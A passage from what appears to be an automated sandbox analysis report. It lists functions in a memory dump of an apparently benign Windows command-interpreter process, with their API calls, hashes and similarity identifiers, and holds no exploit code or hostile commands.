                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011E96FE
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011E974A
                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 011E9775
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                    • String ID:
                                    • API String ID: 3588551418-0
                                    • Opcode ID: f659bcab8664d38da087e5813f7fecc5e2366bad65e6bd2f27abcbf9ddb15866
                                    • Instruction ID: 94303b79d4cea92381e1c686a523375f7286b7d0a4788e33adbbe26041e15c91
                                    • Opcode Fuzzy Hash: f659bcab8664d38da087e5813f7fecc5e2366bad65e6bd2f27abcbf9ddb15866
                                    • Instruction Fuzzy Hash: DA31B135A00506DBEF2CDF69E85C97A7BBAFB94259B624429E902C7294DF309C40CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6A96, Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011E6ACB
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000000), ref: 011E6B0F
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 011E6B3E
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E6B4F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$DriveInformationTypeVolume
                                    • String ID:
                                    • API String ID: 285405857-0
                                    • Opcode ID: 56ff5f9e2a87cb4280d50d4b4de377f84d8b740715e64142e4a7bc93ea9d9610
                                    • Instruction ID: 86f3d03b8a6e16212ce5322eb9d1fbbe6b5c0d355f4806a6a26269132e3a02a2
                                    • Opcode Fuzzy Hash: 56ff5f9e2a87cb4280d50d4b4de377f84d8b740715e64142e4a7bc93ea9d9610
                                    • Instruction Fuzzy Hash: 8C21A371E00118ABDF28DBE8DC4DAEFBBB8EF15754F44056AE505E3150EB359A40CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E0662, Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E0699
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D69F2,?,00000001,?,?,00000000), ref: 011E06A1
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: FilePointer_get_osfhandle
                                    • String ID:
                                    • API String ID: 1013686580-0
                                    • Opcode ID: 3386d17ffc2c5c24d1f54361adbaf0be4cc72edb537c38a8cd2683ed2d2906a0
                                    • Instruction ID: a71ef4aaead2248e08f059e014b95d27990d2079652d11dd5acb87c48134e80e
                                    • Opcode Fuzzy Hash: 3386d17ffc2c5c24d1f54361adbaf0be4cc72edb537c38a8cd2683ed2d2906a0
                                    • Instruction Fuzzy Hash: D7110232200606AFEB3CABACBC5DB2A7BE5EB58364F200519F105971C4CFA29980C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F7EC0, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F7EF1
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 011F7EFE
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: BufferConsoleFileHandleInfoScreenType_get_osfhandle
                                    • String ID:
                                    • API String ID: 2847887402-0
                                    • Opcode ID: 815e8209c4c19c277aeea599712e0ef134a3d18cd5f92f181ae0175ee7635e2a
                                    • Instruction ID: e12c5198fc3f268a288462e2deeb706a6c92e8849a782baa7016f011173683a3
                                    • Opcode Fuzzy Hash: 815e8209c4c19c277aeea599712e0ef134a3d18cd5f92f181ae0175ee7635e2a
                                    • Instruction Fuzzy Hash: 0B212E7591420A9ACF14EFF4A918AFEB7B8EF1C614F10011AE915E7180EB349981876A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E46D8, Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(011E458C), ref: 011E46D8
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E46E9
                                    • memset.MSVCRT ref: 011E4703
                                    • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011EE8B8
                                    • memset.MSVCRT ref: 011EE92E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$ConsoleInfoLocaleOutputThread
                                    • String ID:
                                    • API String ID: 1263632223-0
                                    • Opcode ID: e2dde94db979ae5bd27ea8495d7740b0ab37d297359a0251ed8715680f1c201f
                                    • Instruction ID: 23d803f6c67ad00235022ed27ea3fdaad82514ab50e12a368eaad7b1648e3c5e
                                    • Opcode Fuzzy Hash: e2dde94db979ae5bd27ea8495d7740b0ab37d297359a0251ed8715680f1c201f
                                    • Instruction Fuzzy Hash: 4F118970D18A519FEB3EDF98B80D7713BC0BB10720F4802AAE5C15A58AF7A842C5C756
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F3BB0, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3BBA
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3BE9
                                    • _getch.MSVCRT ref: 011F3BEF
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3C07
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3C1D
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                    • String ID:
                                    • API String ID: 491502236-0
                                    • Opcode ID: 286fea7131610a01551c214ef4a9d74bfa9301aa56eb28e935ab3ce3ac056a43
                                    • Instruction ID: abd1d2d664a651f4f02b1e5ca1b83fe43c9fe2bf23d56590595e316bbb62bdb6
                                    • Opcode Fuzzy Hash: 286fea7131610a01551c214ef4a9d74bfa9301aa56eb28e935ab3ce3ac056a43
                                    • Instruction Fuzzy Hash: 0B01D832514255AFDB2DEB65BC1DBAA7BA9FB10324F00025EFA1682084DFB18A80C351
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E3AAE, Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                    • memcpy.MSVCRT ref: 011E3AE3
                                    • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
                                    • String ID:
                                    • API String ID: 713576409-0
                                    • Opcode ID: d1c4b641443313ddeaa8d7f896aaf08c0ccb79adb899698d60ed3f1e93d1757e
                                    • Instruction ID: f84b0b0ddba6df0dee14cdd1735a99c968783b6c124e7ce4adbd897c6478f49f
                                    • Opcode Fuzzy Hash: d1c4b641443313ddeaa8d7f896aaf08c0ccb79adb899698d60ed3f1e93d1757e
                                    • Instruction Fuzzy Hash: 34E09273A0091167DA3166AE7C5CDAF6DAEEBD99657150058F91AC3204DF308CC246B2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E5266, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 303COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E5590: memset.MSVCRT ref: 011E5614
                                      • Part of subcall function 011E0040: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,011E36B3,011E3691,00000000), ref: 011E0078
                                      • Part of subcall function 011E0040: RtlFreeHeap.NTDLL(00000000), ref: 011E007F
                                    • memset.MSVCRT ref: 011E5303
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • memset.MSVCRT ref: 011E547A
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,?), ref: 011EF111
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$memset$Process$AllocFreelongjmp
                                    • String ID: *.*
                                    • API String ID: 539101449-438819550
                                    • Opcode ID: 27be6b93dd1fcd828cadc6e1e1316623b2fa948dbe10fb922e1a4106583762fe
                                    • Instruction ID: f272619b77c9fde7b7153aa4ca50a1b8708a0100f008a81fdcae6fb49fc07b02
                                    • Opcode Fuzzy Hash: 27be6b93dd1fcd828cadc6e1e1316623b2fa948dbe10fb922e1a4106583762fe
                                    • Instruction Fuzzy Hash: 1AB1B075E00A069BDB6DDFE8C848AAEBBF3AF58318F154069E905EB241D731DD41CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DF090, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                    • API String ID: 0-1704545398
                                    • Opcode ID: 2b5d0af96e814cbabd102fcacaa2d93e77093fb51009aeaaa89abef7ab3c268d
                                    • Instruction ID: 57408817a8dd5529476c4dff142a9f40bd4cfef1c67897232c3cf6abd08dabe3
                                    • Opcode Fuzzy Hash: 2b5d0af96e814cbabd102fcacaa2d93e77093fb51009aeaaa89abef7ab3c268d
                                    • Instruction Fuzzy Hash: 8B513C317401075BEB3DAFBCD91837A76E2FB95318F49812AD5038B285DB718687C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F4159, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: iswdigit$wcstol
                                    • String ID: aApP
                                    • API String ID: 644763121-2547155087
                                    • Opcode ID: 13c19929543b992d4d1fc5e574e4e91b71b5aaa6719b4bf0e1b63874c5fd8980
                                    • Instruction ID: 0aa3b0cca32f986d17f25b8c548019d41504aff5f6729d95060213638df22435
                                    • Opcode Fuzzy Hash: 13c19929543b992d4d1fc5e574e4e91b71b5aaa6719b4bf0e1b63874c5fd8980
                                    • Instruction Fuzzy Hash: F0410379A0011286EF2CDBACE88527FB7B5BF55204715443EEF46DBA85EB30D982C351
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F4B4E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 011F4B9E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 011F4C2C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: EnumErrorLast
                                    • String ID: %s=%s$.
                                    • API String ID: 1967352920-4275322459
                                    • Opcode ID: d314d35c3486a268e026177c53f8399a4ff5da415a5c2493de5dad2cec4985f2
                                    • Instruction ID: 666e5663c9a4e08802e6672649645547f98ad4a168bfce08b4b2956925f350b7
                                    • Opcode Fuzzy Hash: d314d35c3486a268e026177c53f8399a4ff5da415a5c2493de5dad2cec4985f2
                                    • Instruction Fuzzy Hash: B6416871F0021A87CB3CABAD9CA8BBB76F9EB94314F0501ADDA1A97240DF704E418791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FAB79, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011FABB5
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • _wcslwr.MSVCRT ref: 011FAC29
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAC59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$_wcslwr
                                    • String ID: [%s]
                                    • API String ID: 886762496-302437576
                                    • Opcode ID: b9b84d905259faf843a9373ea6ad6168b09eab37c2284d8bdd14e7427d8d1183
                                    • Instruction ID: c09e236cb5b70b2300a053064a6c06793fd04e8c558ed09549297d71da787e97
                                    • Opcode Fuzzy Hash: b9b84d905259faf843a9373ea6ad6168b09eab37c2284d8bdd14e7427d8d1183
                                    • Instruction Fuzzy Hash: 32217571B002195BDB19DAE4E989BBEBBE8AF58314F4804ADE609D3141EB74DE44CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E62FA, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsnicmp
                                    • String ID: /-Y$COPYCMD
                                    • API String ID: 1886669725-617350906
                                    • Opcode ID: 007c1bb04e1bda4d31a699e55e4d7fefbd4d337cb042c61281ed1da372ea2239
                                    • Instruction ID: 0c03cfd9843b9412f30f3c6e4ef8bd79977d8261c01111121fc3b547cca2b04f
                                    • Opcode Fuzzy Hash: 007c1bb04e1bda4d31a699e55e4d7fefbd4d337cb042c61281ed1da372ea2239
                                    • Instruction Fuzzy Hash: 9F219B72A08A1297DB2C9B9E984D6BAFAF6EFA5250F950069FC4D97241EF308D41C250
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E23A9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E2430: iswspace.MSVCRT ref: 011E2440
                                    • iswspace.MSVCRT ref: 011E23C8
                                    • _wcsnicmp.MSVCRT ref: 011E2419
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: iswspace$_wcsnicmp
                                    • String ID: off
                                    • API String ID: 3989682491-733764931
                                    • Opcode ID: 8a0af50a4a01f09a364fe918f145a58c87cd44f753eb4ea734b20fb6b8fc66ce
                                    • Instruction ID: e69aba4d19a21cf1db1f221edfc95bb234fc90446da2207306f5561b6a4fc8fa
                                    • Opcode Fuzzy Hash: 8a0af50a4a01f09a364fe918f145a58c87cd44f753eb4ea734b20fb6b8fc66ce
                                    • Instruction Fuzzy Hash: F2114C22704E1256FF3E12EE7C7EF3A55EC9F95959B19002AFD46E60C1EF7089808162
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F4506, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E7721: __iob_func.MSVCRT ref: 011E7726
                                    • fprintf.MSVCRT ref: 011F4522
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: __iob_funcfprintf
                                    • String ID: CMD Internal Error %s$%s$Null environment
                                    • API String ID: 620453056-2781220306
                                    • Opcode ID: eb19b79a726f596bf4e5e6a4a992bc2cb5ed2d63eb28a2d781464dedadf5cfba
                                    • Instruction ID: 2455adb61447690e94106b46cdd9ec1ad82f53c622971da49736dc96b39d309f
                                    • Opcode Fuzzy Hash: eb19b79a726f596bf4e5e6a4a992bc2cb5ed2d63eb28a2d781464dedadf5cfba
                                    • Instruction Fuzzy Hash: 40019E77A442118EDB3CBB9C785D5B37354EAD0214315053FEE6693D54FB705942C141
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F2950, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 011F2979
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 011F298A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: RtlDllShutdownInProgress$ntdll.dll
                                    • API String ID: 1646373207-582119455
                                    • Opcode ID: 21eab838b83626d7c075a2ff88e5b9b68ef2da93aa89548445e264d6cca09167
                                    • Instruction ID: 214ba48a93f13fbb78718f528236add32a921ae3f11247491a49c13772eb1db1
                                    • Opcode Fuzzy Hash: 21eab838b83626d7c075a2ff88e5b9b68ef2da93aa89548445e264d6cca09167
                                    • Instruction Fuzzy Hash: 1FF09031A20328DB8F39DF69B91D67A37E8FB54A98781025DEC01D7208EF719D418BD2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D88D8, Relevance: 6.2, APIs: 4, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011D8991
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D8AAB
                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$CurrentDirectory
                                    • String ID:
                                    • API String ID: 168429351-0
                                    • Opcode ID: 10d097d6ebd7d447ee04fbd723f1d90870b57ec9d1276c4b18fcd69d903e8d81
                                    • Instruction ID: 659a171f208aa7f7ccb7f6b7326bde9e71d26b5a2e188439e0af765a3fd8b6fc
                                    • Opcode Fuzzy Hash: 10d097d6ebd7d447ee04fbd723f1d90870b57ec9d1276c4b18fcd69d903e8d81
                                    • Instruction Fuzzy Hash: 4E6156B1A083029FD72CDF69D48466BBBE5BBD8314F14492EF699C3250EB709904CB87
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D5F75, Relevance: 6.2, APIs: 4, Instructions: 183COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsnicmp$wcschr
                                    • String ID:
                                    • API String ID: 3270668897-0
                                    • Opcode ID: 6882690f09108301da322c924d95972048bff093752235bb1f516b1b17fecf5e
                                    • Instruction ID: e21ea13337b8509a8886dbc2996baa5dbb390130eee3705bd4618ba193e3823a
                                    • Opcode Fuzzy Hash: 6882690f09108301da322c924d95972048bff093752235bb1f516b1b17fecf5e
                                    • Instruction Fuzzy Hash: 35519E39200A119BEB2CEBACA86867F77F1EF94644B55445DE8439B2C1FB714E82C391
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DAF70, Relevance: 6.2, APIs: 4, Instructions: 179COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • _pipe.MSVCRT ref: 011DAF9F
                                      • Part of subcall function 011DDBCE: _dup.MSVCRT ref: 011DDBD5
                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011F12F1
                                      • Part of subcall function 011DDBFC: _dup2.MSVCRT ref: 011DDC10
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    • _get_osfhandle.MSVCRT ref: 011DB047
                                    • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011DB055
                                      • Part of subcall function 011DE040: memset.MSVCRT ref: 011DE090
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE0F3
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE10B
                                      • Part of subcall function 011DE040: _wcsicmp.MSVCRT ref: 011DE179
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                    • String ID:
                                    • API String ID: 1441200171-0
                                    • Opcode ID: 6cad21d06427e9c0ae52906e1e5b7ca901d78b711cd73aa69c338ffce1a03d55
                                    • Instruction ID: 4adc1ec5e026a01e762791da8a3d31ae191c7c722cd5859a0596a3743e8a29b3
                                    • Opcode Fuzzy Hash: 6cad21d06427e9c0ae52906e1e5b7ca901d78b711cd73aa69c338ffce1a03d55
                                    • Instruction Fuzzy Hash: CC51BF746047019FDB3CDF79E899A3A77E1EB95328B108A2EE46BC72D4DB30A441CB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E02B0, Relevance: 6.2, APIs: 4, Instructions: 165COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: iswdigit
                                    • String ID:
                                    • API String ID: 3849470556-0
                                    • Opcode ID: 56c411d0bb0143154565cf3f04d095eab591efeb6e4135075c6b1875747ee49d
                                    • Instruction ID: d09a34828198d013f7ac1bce7e74096f6f9a04199d44658a5ec333314f793b97
                                    • Opcode Fuzzy Hash: 56c411d0bb0143154565cf3f04d095eab591efeb6e4135075c6b1875747ee49d
                                    • Instruction Fuzzy Hash: 4C51D470A046019FDB2DDFE9D59827EB7E1EB88304F15416AE90187381EBB59A82CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

